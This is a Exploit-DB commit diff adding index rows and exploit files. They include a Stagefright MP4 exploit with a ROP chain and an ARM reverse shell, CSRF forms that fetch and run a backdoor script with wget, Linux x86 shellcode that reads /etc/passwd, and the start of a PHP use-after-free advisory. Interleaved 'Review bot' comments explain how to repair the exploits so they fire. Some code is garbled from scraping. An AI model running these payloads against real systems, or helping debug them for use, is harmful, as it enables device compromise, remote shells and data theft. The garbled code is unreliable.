DB: 2015-09-10

15 new exploits
Offensive Security 2015-09-10 05:04:12 +00:00
parent 97d811ea96
commit 229204741f
16 changed files with 1501 additions and 0 deletions


@ -34403,6 +34403,7 @@ id,file,description,date,author,platform,type,port
38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Include Vulnerability",2012-12-30,Amirh03in,php,webapps,0
38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection Vulnerability",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0
38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection Vulnerability",2012-12-04,AkaStep,php,webapps,0
38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit (Shell Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
@ -34410,3 +34411,17 @@ id,file,description,date,author,platform,type,port
38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0_ 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0
38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0
38111,platforms/php/webapps/38111.txt,"Wordpress Simple Gmail Login Plugin Stack Trace Information Disclosure Vulnerability",2012-12-07,"Aditya Balapure",php,webapps,0
38112,platforms/php/webapps/38112.txt,"FOOT Gestion 'id' Parameter SQL Injection Vulnerability",2012-12-07,"Emmanuel Farcy",php,webapps,0
38113,platforms/php/webapps/38113.php,"VBulletin ajaxReg Module SQL Injection Vulnerability",2012-12-08,"Cold Zero",php,webapps,0
38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0
38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module Unspecified Customer Field XSS",2012-12-10,tommccredie,php,webapps,0
38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0
38118,platforms/xml/webapps/38118.txt,"Qlikview <= 11.20 SR11 - Blind XXE Injection Vulnerability",2015-09-09,"Alex Haynes",xml,webapps,0
38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - CSRF Vulnerability",2015-09-09,"Aryan Bayaninejad",php,webapps,0
38120,platforms/php/dos/38120.txt,"PHP SplDoublyLinkedList unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38122,platforms/php/dos/38122.txt,"PHP SplObjectStorage unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
38125,platforms/php/dos/38125.txt,"PHP unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
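Review bot: The new `38094` row is inserted between `38103` and `38095` in the first hunk, so the id column is no longer monotonic around it; move it above the `38095` row so tooling that assumes sorted ids keeps working. The new `38111` row also writes `Wordpress` where the neighbouring `38101`/`38102` rows use `WordPress`; keeping the spelling consistent makes description searches match. Both hunks are index-only changes, so nothing else in this section needs attention.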


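--- a/platforms/android/remote/38124.py
+++ b/platforms/android/remote/38124.py
@@ -0,0 +1,377 @@
+#!/usr/bin/env python
+# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
+# Shout outs to our friends at Optiv (formerly Accuvant Labs)
+# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
+# www.zimperium.com
+#
+# Exploit for RCE Vulnerability CVE-2015-1538 #1
+# Integer Overflow in the libstagefright MP4 stsc atom handling
+#
+# Dont forget, the output of “create_mp4” can be delivered many ways!
+# MMS is the most dangerous attack vector, but not the only one…
+#
+# DISCLAIMER: This exploit is for testing and educational purposes only. Any
+# other usage for this code is not allowed. Use at your own risk.
+#
+# “With great power comes great responsibility.” Uncle Ben
+#
+import struct
+import socket
+#
+# Creates a single MP4 atom LEN, TAG, DATA
+#
+def make_chunk(tag, data):
+if len(tag) != 4:
+raise Yo! They call it FourCC for a reason.
+ret = struct.pack(>L, len(data) + 8)
+ret += tag
+ret += data
+return ret
+#
+# Make an stco atom Sample Table Chunk Offets
+#
+def make_stco(extra=):
+ret = struct.pack(>L, 0) # version
+ret += struct.pack(>L, 0) # mNumChunkOffsets
+return make_chunk(stco, ret+extra)
+#
+# Make an stsz atom Sample Table Size
+#
+def make_stsz(extra=):
+ret = struct.pack(>L, 0) # version
+ret += struct.pack(>L, 0) # mDefaultSampleSize
+ret += struct.pack(>L, 0) # mNumSampleSizes
+return make_chunk(stsz, ret+extra)
+#
+# Make an stts atom Sample Table Time-to-Sample
+#
+def make_stts():
+ret = struct.pack(>L, 0) # version
+ret += struct.pack(>L, 0) # mTimeToSampleCount
+return make_chunk(stts, ret)
+#
+# This creates a single Sample Table Sample-to-Chunk entry
+#
+def make_stsc_entry(start, per, desc):
+ret =
+ret += struct.pack(>L, start + 1)
+ret += struct.pack(>L, per)
+ret += struct.pack(>L, desc)
+return ret
+#
+# Make an stsc chunk Sample Table Sample-to-Chunk
+#
+# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
+# cause a heap overflow.
+#
+def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
+ret = struct.pack(>L, 0) # version/flags
+# this is the clean version…
+if not do_overflow:
+ret += struct.pack(>L, num_alloc) # mNumSampleToChunkOffsets
+ret += Z * (12 * num_alloc)
+return make_chunk(stsc, ret)
+# now the explicit version. (trigger the bug)
+ret += struct.pack(>L, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
+# fill in the entries that will overflow the buffer
+for x in range(0, num_write):
+ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
+ret = make_chunk(stsc, ret)
+# patch the data_size
+ret = struct.pack(>L, 8 + 8 + (num_alloc * 12)) + ret[4:]
+return ret
+#
+# Build the ROP chain
+#
+# ROP pivot by Georg Wicherski! Thanks!
+#
+(gdb) x/10i __dl_restore_core_regs
+0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
+0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
+0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}
+0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
+0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}
+b0001144 <__dl_mprotect>:
+b0001144: e92d0090 push {r4, r7}
+b0001148: e3a0707d mov r7, #125 ; 0x7d
+b000114c: ef000000 svc 0x00000000
+b0001150: e8bd0090 pop {r4, r7}
+b0001154: e1b00000 movs r0, r0
+b0001158: 512fff1e bxpl lr
+b000115c: ea0015cc b b0006894 <__dl_raise+0x10>
+def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
+rop =
+rop += struct.pack(<L, sp_addr + off + 0x10) # new sp
+rop += struct.pack(<L, 0xb0002a98) # new lr pop {pc}
+rop += struct.pack(<L, 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
+rop += struct.pack(<L, sp_addr & 0xfffff000) # new r0 base address (page aligned)
+rop += struct.pack(<L, 0x1000) # new r1 length
+rop += struct.pack(<L, 7) # new r2 protection
+rop += struct.pack(<L, 0xd000d003) # new r3 scratch
+rop += struct.pack(<L, 0xd000d004) # new r4 scratch
+rop += struct.pack(<L, 0xb0001144) # new pc _dl_mprotect
+native_start = sp_addr + 0x80
+rop += struct.pack(<L, native_start) # address of native payload
+#rop += struct.pack(<L, 0xfeedfed5) # top of stack…
+# linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
+buf =
+# fork
+buf += \x02\x70\xa0\xe3
+buf += \x00\x00\x00\xef
+# continue if not parent…
+buf += \x00\x00\x50\xe3
+buf += \x02\x00\x00\x0a
+# exit parent
+buf += \x00\x00\xa0\xe3
+buf += \x01\x70\xa0\xe3
+buf += \x00\x00\x00\xef
+# setsid in child
+buf += \x42\x70\xa0\xe3
+buf += \x00\x00\x00\xef
+# socket/connect/dup2/dup2/dup2
+buf += \x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c
+buf += \x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60
+buf += \xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0
+buf += \xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1
+buf += \x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06
+buf += \x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00
+buf += \x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0
+buf += \xe3\x00\x00\x00\xef
+# execve(shell, argv, env)
+buf += \x30\x00\x8f\xe2\x04\x40\x24\xe0
+buf += \x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d
+buf += \x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00
+buf += \x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00
+buf += \xef\x02\x00
+# Add the connect back host/port
+buf += struct.pack(!H, cb_port)
+cb_host = socket.inet_aton(cb_host)
+buf += struct.pack(=4s, cb_host)
+# shell
+buf += /system/bin/sh\x00\x00
+# argv
+buf += sh\x00\x00
+# env
+buf += PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00
+# Add some identifiable stuff, just in case something goes awry…
+rop_start_off = 0x34
+x = rop_start_off + len(rop)
+while len(rop) < 0x80 rop_start_off:
+rop += struct.pack(<L, 0xf0f00000+x)
+x += 4
+# Add the native payload…
+rop += buf
+return rop
+#
+# Build an mp4 that exploits CVE-2015-1538 #1
+#
+# We mimic meow.3gp here…
+#
+def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
+chunks = []
+# Build the MP4 header…
+ftyp = mp42
+ftyp += struct.pack(>L, 0)
+ftyp += mp42
+ftyp += isom
+chunks.append(make_chunk(ftyp, ftyp))
+# Note, this causes a few allocations…
+moov_data =
+moov_data += make_chunk(mvhd,
+struct.pack(>LL, 0, 0x41414141) +
+(B * 0x5c) )
+# Add a minimal, verified trak to satisfy mLastTrack being set
+moov_data += make_chunk(trak,
+make_chunk(stbl,
+make_stsc(0x28, 0x28) +
+make_stco() +
+make_stsz() +
+make_stts() ))
+# Spray the heap using a large tx3g chunk (can contain binary data!)
+0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
+0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
+0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
+0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
+0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
+0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
+0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
+0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
+0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
+0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
+0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
+0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
+page =
+off = 0 # the offset to the next object
+off += 8
+page += struct.pack(<L, sp_addr + 8 + 16 + 8 + 12 28) # _vptr.RefBase (for when we smash mDataSource)
+page += struct.pack(<L, sp_addr + off) # mRefs
+off += 16
+page += struct.pack(<L, 1) # mStrong
+page += struct.pack(<L, 0xc0dedbad) # mWeak
+page += struct.pack(<L, sp_addr + off) # mBase
+page += struct.pack(<L, 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
+off += 8
+page += struct.pack(<L, sp_addr + off) # the mBase _vptr.RefBase
+page += struct.pack(<L, 0xf00dbabe) # mBase.mRefs (unused)
+off += 16
+page += struct.pack(<L, 0xc0de0000 + 0x00) # vtable entry 0
+page += struct.pack(<L, 0xc0de0000 + 0x04) # vtable entry 4
+page += struct.pack(<L, 0xc0de0000 + 0x08) # vtable entry 8
+page += struct.pack(<L, newpc_val) # vtable entry 12
+rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
+x = len(page)
+while len(page) < 4096:
+page += struct.pack(<L, 0xf0f00000+x)
+x += 4
+off = 0x34
+page = page[:off] + rop + page[off+len(rop):]
+spray = page * (((2*1024*1024) / len(page)) 20)
+moov_data += make_chunk(tx3g, spray)
+block = A * 0x1c
+bigger = B * 0x40
+udta = make_chunk(udta,
+make_chunk(meta,
+struct.pack(>L, 0) +
+make_chunk(ilst,
+make_chunk(cpil, make_chunk(data, struct.pack(>LL, 21, 0) + A)) +
+make_chunk(trkn, make_chunk(data, struct.pack(>LL, 0, 0) + AAAABBBB)) +
+make_chunk(disk, make_chunk(data, struct.pack(>LL, 0, 0) + AAAABB)) +
+make_chunk(covr, make_chunk(data, struct.pack(>LL, 0, 0) + block)) * 32 +
+make_chunk(\xa9alb, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
+make_chunk(\xa9ART, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
+make_chunk(aART, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
+make_chunk(\xa9day, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
+make_chunk(\xa9nam, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
+make_chunk(\xa9wrt, make_chunk(data, struct.pack(>LL, 0, 0) + block)) +
+make_chunk(gnre, make_chunk(data, struct.pack(>LL, 1, 0) + block)) +
+make_chunk(covr, make_chunk(data, struct.pack(>LL, 0, 0) + block)) * 32 +
+make_chunk(\xa9ART, make_chunk(data, struct.pack(>LL, 0, 0) + bigger)) +
+make_chunk(\xa9wrt, make_chunk(data, struct.pack(>LL, 0, 0) + bigger)) +
+make_chunk(\xa9day, make_chunk(data, struct.pack(>LL, 0, 0) + bigger)))
+)
+)
+moov_data += udta
+# Make the nasty trak
+tkhd1 = .join([
+\x00, # version
+D * 3, # padding
+E * (5*4), # {c,m}time, id, ??, duration
+F * 0x10, # ??
+struct.pack(>LLLLLL,
+0x10000, # a00
+0, # a01
+0, # dx
+0, # a10
+0x10000, # a11
+0), # dy
+G * 0x14
+])
+trak1 =
+trak1 += make_chunk(tkhd, tkhd1)
+mdhd1 = .join([
+\x00, # version
+D * 0x17, # padding
+])
+mdia1 =
+mdia1 += make_chunk(mdhd, mdhd1)
+mdia1 += make_chunk(hdlr, F * 0x3a)
+dinf1 =
+dinf1 += make_chunk(dref, H * 0x14)
+minf1 =
+minf1 += make_chunk(smhd, G * 0x08)
+minf1 += make_chunk(dinf, dinf1)
+# Build the nasty sample table to trigger the vulnerability here.
+stbl1 = make_stsc(3, (0x1200 / 0xc) 1, sp_addr, True) # TRIGGER
+# Add the stbl to the minf chunk
+minf1 += make_chunk(stbl, stbl1)
+# Add the minf to the mdia chunk
+mdia1 += make_chunk(minf, minf1)
+# Add the mdia to the track
+trak1 += make_chunk(mdia, mdia1)
+# Add the nasty track to the moov data
+moov_data += make_chunk(trak, trak1)
+# Finalize the moov chunk
+moov = make_chunk(moov, moov_data)
+chunks.append(moov)
+# Combine outer chunks together and voila.
+data = .join(chunks)
+return data
+if __name__ == __main__:
+import sys
+import mp4
+import argparse
+def write_file(path, content):
+with open(path, wb) as f:
+f.write(content)
+def addr(sval):
+if sval.startswith(0x):
+return int(sval, 16)
+return int(sval)
+# The address of a fake StrongPointer object (sprayed)
+sp_addr = 0x41d00010 # takju @ imm76i 2MB (via hangouts)
+# The address to of our ROP pivot
+newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
+# Allow the user to override parameters
+parser = argparse.ArgumentParser()
+parser.add_argument(-c, connectback-host, dest=cbhost, default=31.3.3.7)
+parser.add_argument(-p, connectback-port, dest=cbport, type=int, default=12345)
+parser.add_argument(-s, spray-address, dest=spray_addr, type=addr, default=None)
+parser.add_argument(-r, rop-pivot, dest=rop_pivot, type=addr, default=None)
+parser.add_argument(-o, output-file, dest=output_file, default=cve-2015-1538-1.mp4)
+args = parser.parse_args()
+if len(sys.argv) == 1:
+parser.print_help()
+sys.exit(1)
+if args.spray_addr == None:
+args.spray_addr = sp_addr
+if args.rop_pivot == None:
+args.rop_pivot = newpc_val
+# Build the MP4 file…
+data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
+print([*] Saving crafted MP4 to %s % args.output_file)
+write_file(args.output_file, data) - See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/#sthash.MbvoiMxd.dpuf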
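Review bot: The script as committed cannot run: the last line has the scraped blog footer ` - See more at: https://blog.zimperium.com/...` appended after `write_file(args.output_file, data)`, which is a SyntaxError, and the `__main__` block does `import mp4` and calls `mp4.create_mp4(...)`, which only resolves if this very file is saved as `mp4.py`. Drop the trailing text, remove `import mp4`, and call the local function directly, `data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)`. The defaults are build-specific — `sp_addr = 0x41d00010` is annotated `takju @ imm76i` and the pivot `0xb0002850` is a fixed linker address — so the header should state that `-s`/`-r` must be re-derived for any other device/build, and that the embedded payload forks, calls setsid and connects back to `-c`/`-p` (default `31.3.3.7:12345`) with a `/system/bin/sh`, which matters for anyone testing it in a lab. Quote characters and `-` operators also appear to be missing in this rendering (`struct.pack(>L, ...)`, `0x80 rop_start_off`, `12 28`, `(0x1200 / 0xc) 1`); presumably the committed file has them, but since the code was copied from a web page, it is worth confirming the literals are ASCII quotes and not typographic ones.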

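--- a/platforms/cgi/webapps/38114.html
+++ b/platforms/cgi/webapps/38114.html
@@ -0,0 +1,62 @@
+source: http://www.securityfocus.com/bid/56881/info
+Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.
+Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.
+Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected.
+1.
+<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl"
+method="post" name=f1>
+<input type="hidden" name="platformDD2" value='android' />
+<input type="hidden" name="hostingPath" value='a & wget
+http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch &&
+./backdoor.sh & ' />
+<input type="submit" id="btn">
+</form>
+<script>
+document.f1.Submit()
+</script>
+2.
+<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl"
+method="post" name=f1>
+<input type="hidden" name="hostingPath" value='a & wget
+http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
+./backdoor.sh & ' />
+<input type="submit" id="btn">
+</form>
+<script>
+document.f1.Submit()
+</script>
+3.
+<form
+action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl"
+method="post" name=f1>
+<input type="hidden" name="appURLPath" value='a & wget
+http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
+./backdoor.sh & ' />
+<input type="submit" id="btn">
+</form>
+<script>
+document.f1.Submit()
+</script>
+4.
+<form
+action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl"
+method="post" name=f1>
+<input type="hidden" name="ipAddressTB" value='a & wget
+http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
+./backdoor.sh & ' />
+<input type="submit" id="btn">
+</form>
+<script>
+document.f1.Submit()
+</script>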
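Review bot: PoC 1 stages `chmod a+x ./backdoor.ch` but then runs `./backdoor.sh` (PoCs 2–4 use `.sh` in both places), so the first payload marks the wrong path executable and the dropped script never runs; change it to `chmod a+x ./backdoor.sh`. The auto-submit in all four forms, `document.f1.Submit()`, calls a method that does not exist — JavaScript is case-sensitive and the DOM method is `HTMLFormElement.submit()` — so the call throws and the CSRF page only fires if the victim clicks the button; use `document.f1.submit()`. The advisory text at the top would also be more useful if it named the injected POST parameters (`hostingPath`, `appURLPath`, `ipAddressTB`) and that each is passed unquoted to a shell, since that is what the four forms demonstrate.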

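--- a/platforms/lin_x86/shellcode/38094.c
+++ b/platforms/lin_x86/shellcode/38094.c
@@ -0,0 +1,72 @@
+#!/bin/python
+from sys import argv
+"""
+Shellcode Generator...
+Create file with permission 7775
+---------------------------------------------------------------------------------
+Disassembly of section .text:
+08048060 <.text>:
+8048060: eb 12 jmp 0x8048074
+8048062: 5b pop %ebx
+8048063: 31 c0 xor %eax,%eax
+8048065: 88 43 05 mov %al,0x5(%ebx)
+8048068: b0 08 mov $0x8,%al
+804806a: b1 ff mov $0xff,%cl
+804806c: b5 ff mov $0xff,%ch
+804806e: cd 80 int $0x80
+8048070: b0 01 mov $0x1,%al
+8048072: cd 80 int $0x80
+8048074: e8 e9 ff ff ff call 0x8048062
+8048079: 61 popa
+804807a: 6a 69 push $0x69
+804807c: 74 68 je 0x80480e6
+804807e: 23 .byte 0x23
+---------------------------------------------------------------------------------
+b4ck 2 h4ck --- Ajith Kp [@ajithkp560] --- http://www.terminalcoders.blogspot.com
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+"""
+bann3r = '''
+/*
+[][][][][][][][][][][][][][][][][][][][][][][]
+[] []
+[] c0d3d by Ajith Kp [ajithkp560] []
+[] http://www.terminalcoders.blogspot.in []
+[] []
+[][][][][][][][][][][][][][][][][][][][][][][]
+*/
+'''
+sh3ll = "\\xeb\\x12\\x5b\\x31\\xc0\\x88\\x43"
+sh311 ="\\xb0\\x08\\xb1\\xff\\xb5\\xff\\xcd\\x80\\xb0\\x01\\xcd\\x80\\xe8\\xe9\\xff\\xff\\xff"
+print bann3r
+if len(argv)<1:
+print 'Usage: '+argv[0]+' name_of_file'
+else:
+fil3 = argv[1]
+h3x = ''
+for i in range(len(fil3)):
+h3x+=str('\\'+hex(ord(fil3[i]))[1:])
+h3x+=str('\\' + 'x23')
+l3n = '\\x'+hex((len(fil3)))[2:].zfill(2)
+sh = str(sh3ll) + str(l3n) + str(sh311) + str(h3x)
+print '// Compile with'
+print '// $ gcc -o output source.c'
+print '// $ execstack -s output'
+print '// $ ./output'
+print '////////////////////////////////////////////\n'
+print '# include <stdio.h>'
+print 'char sh[] = "'+sh+'";'
+print 'main(int argc, char **argv)'
+print '''{
+int (*func)();
+func = (int (*)()) sh;
+(int)(*func)();'''
+print '}'
+print '\n////////////////////////////////////////////'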
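Review bot: The usage check `if len(argv)<1:` can never be true — `argv[0]` is always present — so running the generator without a filename falls into the `else` branch and dies with an IndexError at `fil3 = argv[1]`; the test should be `if len(argv) < 2:`. The emitted `l3n` byte becomes the one-byte displacement of `mov %al,LEN(%ebx)` (`\x88\x43` + length), which is sign-extended on x86, so a name longer than 127 bytes or one containing a NUL silently yields a stub that writes the terminator to the wrong place; a length/byte check before the `h3x` loop would make that limit explicit. The `#!/bin/python` shebang and the bare `print` statements are Python 2 only, and the csv row records this generator as `38094.c` although it is a Python script — presumably deliberate, but a one-line comment in the header saying "run with python2, generates the C source" would save readers a detour.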

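--- a/platforms/lin_x86/shellcode/38116.c
+++ b/platforms/lin_x86/shellcode/38116.c
@@ -0,0 +1,76 @@
+/*
+---------------------------------------------------------------------------------------------------
+# Linux/x86 - execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL) - 75 bytes
+# Tested in Zorin OS 10 x86
+# Author: Ajith Kp
+Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+08048060 <.text>:
+8048060: eb 1f jmp 0x8048081
+8048062: 5b pop %ebx
+8048063: 31 c0 xor %eax,%eax
+8048065: 88 43 0b mov %al,0xb(%ebx)
+8048068: 88 43 18 mov %al,0x18(%ebx)
+804806b: 89 5b 19 mov %ebx,0x19(%ebx)
+804806e: 8d 4b 0c lea 0xc(%ebx),%ecx
+8048071: 89 4b 1d mov %ecx,0x1d(%ebx)
+8048074: 89 43 21 mov %eax,0x21(%ebx)
+8048077: b0 0b mov $0xb,%al
+8048079: 8d 4b 19 lea 0x19(%ebx),%ecx
+804807c: 8d 53 21 lea 0x21(%ebx),%edx
+804807f: cd 80 int $0x80
+8048081: e8 dc ff ff ff call 0x8048062
+8048086: 2f das
+8048087: 2f das
+8048088: 2f das
+8048089: 2f das
+804808a: 62 69 6e bound %ebp,0x6e(%ecx)
+804808d: 2f das
+804808e: 63 61 74 arpl %sp,0x74(%ecx)
+8048091: 23 2f and (%edi),%ebp
+8048093: 2f das
+8048094: 65 74 63 gs je 0x80480fa
+8048097: 2f das
+8048098: 70 61 jo 0x80480fb
+804809a: 73 73 jae 0x804810f
+804809c: 77 64 ja 0x8048102
+804809e: 23 41 4a and 0x4a(%ecx),%eax
+80480a1: 49 dec %ecx
+80480a2: 54 push %esp
+80480a3: 48 dec %eax
+80480a4: 41 inc %ecx
+80480a5: 4a dec %edx
+80480a6: 49 dec %ecx
+80480a7: 54 push %esp
+80480a8: 48 dec %eax
+80480a9: 4b dec %ebx
+80480aa: 50 push %eax
+---------------------------------------------------------------------------------------------------
+How To Run
+$ gcc -o cat_etc_passwd cat_etc_passwd.c
+$ execstack -s cat_etc_passwd
+$ ./cat_etc_passwd
+---------------------------------------------------------------------------------------------------
+*/
+#include <stdio.h>
+char sh[]="\xeb\x1f\x5b\x31\xc0\x88\x43\x0b\x88\x43\x18\x89\x5b\x19\x8d\x4b\x0c\x89\x4b\x1d\x89\x43\x21\xb0\x0b\x8d\x4b\x19\x8d\x53\x21\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x63\x61\x74\x23\x2f\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x41\x4a\x49\x54\x48\x41\x4a\x49\x54\x48\x4b\x50";
+// It will create file named 'ajith' with permission 7775
+void main(int argc, char **argv)
+{
+int (*func)();
+func = (int (*)()) sh;
+(int)(*func)();
+}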
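Review bot: The comment `// It will create file named 'ajith' with permission 7775` was carried over from the creat() stub and is wrong for this file, whose header and disassembly show `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`; replace it with `// execve("/bin/cat", {"/bin/cat", "/etc/passwd", NULL}, empty envp); argv/envp are patched into the trailing AJITHAJITHKP bytes at runtime`. That patching — `mov %ebx,0x19(%ebx)`, `mov %ecx,0x1d(%ebx)`, `mov %eax,0x21(%ebx)` writing into the padding after the strings — is why `sh[]` must be both writable and executable, which is the reason for the `execstack -s` step and deserves a sentence in the How To Run block; note also that `edx` points at the NULL written at `0x21`, i.e. an empty envp array rather than a NULL pointer as the title says. `void main(int argc, char **argv)` should be `int main(void)` and the unused `#include <stdio.h>` can go.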

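--- a/platforms/php/dos/38120.txt
+++ b/platforms/php/dos/38120.txt
@@ -0,0 +1,103 @@
+Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
+Taoguang Chen <[@chtg](http://github.com/chtg)> -
+Write Date: 2015.8.27
+Release Date: 2015.9.4
+A use-after-free vulnerability was discovered in unserialize() with SplDoublyLinkedList object's deserialization and crafted object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.
+Affected Versions
+------------
+Affected is PHP 5.6 < 5.6.13
+Affected is PHP 5.5 < 5.5.29
+Affected is PHP 5.4 < 5.4.45
+Credits
+------------
+This vulnerability was disclosed by Taoguang Chen.
+Description
+------------
+while(*p == ':') {
+++p;
+ALLOC_INIT_ZVAL(elem);
+if (!php_var_unserialize(&elem, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+zval_ptr_dtor(&elem);
+goto error;
+}
+spl_ptr_llist_push(intern->llist, elem TSRMLS_CC);
+}
+It has been demonstrated many times before that __wakeup() leads to
+ZVAL is freed from memory. However during deserialization will still
+allow to use R: or r: to set references to that already freed memory.
+It is possible to use-after-free attack and execute arbitrary code
+remotely.
+Proof of Concept Exploit
+------------
+The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
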